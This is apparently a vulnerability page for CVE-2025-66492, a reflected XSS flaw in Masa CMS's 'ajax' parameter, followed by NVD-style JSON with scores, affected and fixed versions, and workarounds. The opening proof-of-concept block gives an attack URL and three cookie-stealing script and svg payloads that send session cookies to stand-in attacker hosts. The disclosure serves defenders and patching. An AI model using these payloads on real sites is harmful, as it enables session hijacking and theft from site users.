CVE-2025-66492

<!-- CVE-2025-66492 PoC - Masa CMS XSS via ajax parameter --> <!-- Attack URL --> https://[target-host]/masacms/?ajax=%3Cscript%3Ealert(document.cookie)%3C/script%3E <!-- More sophisticated PoC - Session Hijacking --> <script> // Steal session cookie fetch('https://attacker-controlled-server/steal?c=' + encodeURIComponent(document.cookie)); </script> <!-- PoC to demonstrate cookie theft and exfiltration --> <script> var cookies = document.cookie; var img = new Image(); img.src = 'https://malicious-domain.com/log?cookie=' + btoa(cookies); </script> <!-- Automated exploitation payload --> <svg/onload=fetch('https://attacker.com/api/collect?data='+btoa(document.cookie))>

{"cve": {"id": "CVE-2025-66492", "sourceIdentifier": "[email protected]", "published": "2025-12-12T05:16:12.463", "lastModified": "2025-12-22T18:46:26.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the <head> section of the HTML page. An attacker can execute arbitrary scripts in the context of the user's session, potentially leading to Session Hijacking, Data Theft, Defacement and Malware Distribution. This issue is fixed in versions 7.5.2, 7.4.9, 7.3.14, and 7.2.9. To work around this issue, configure a Web Application Firewall (WAF) rule (e.g., ModSecurity) to block requests containing common XSS payload characters in the ajax query parameter. Alternatively, implement server-side sanitization using middleware to strip or escape dangerous characters from the ajax parameter before it reaches the vulnerable rendering logic."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.9", "matchCriteriaId": "F223EBA9-7072-453E-9423-8933DD3A0287"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.1", "versionEndExcluding": "7.3.14", "matchCriteriaId": "5F999D3E-1AEA-45C4-A47B-8D80C565E186"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "1E6D031D-F388-40F4-B31B-B81BC9272EAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.5.0", "versionEndExcluding": "7.5.2", "matchCriteriaId": "91729543-F734-4B7B-BE18-DF5B8D99AFD4"}]}]}], "references": [{"url": "https://github.com/MasaCMS/MasaCMS/commit/376c27196b1e2489888b7a000cdf5c45bb85959e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-249c-vqwv-43vc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}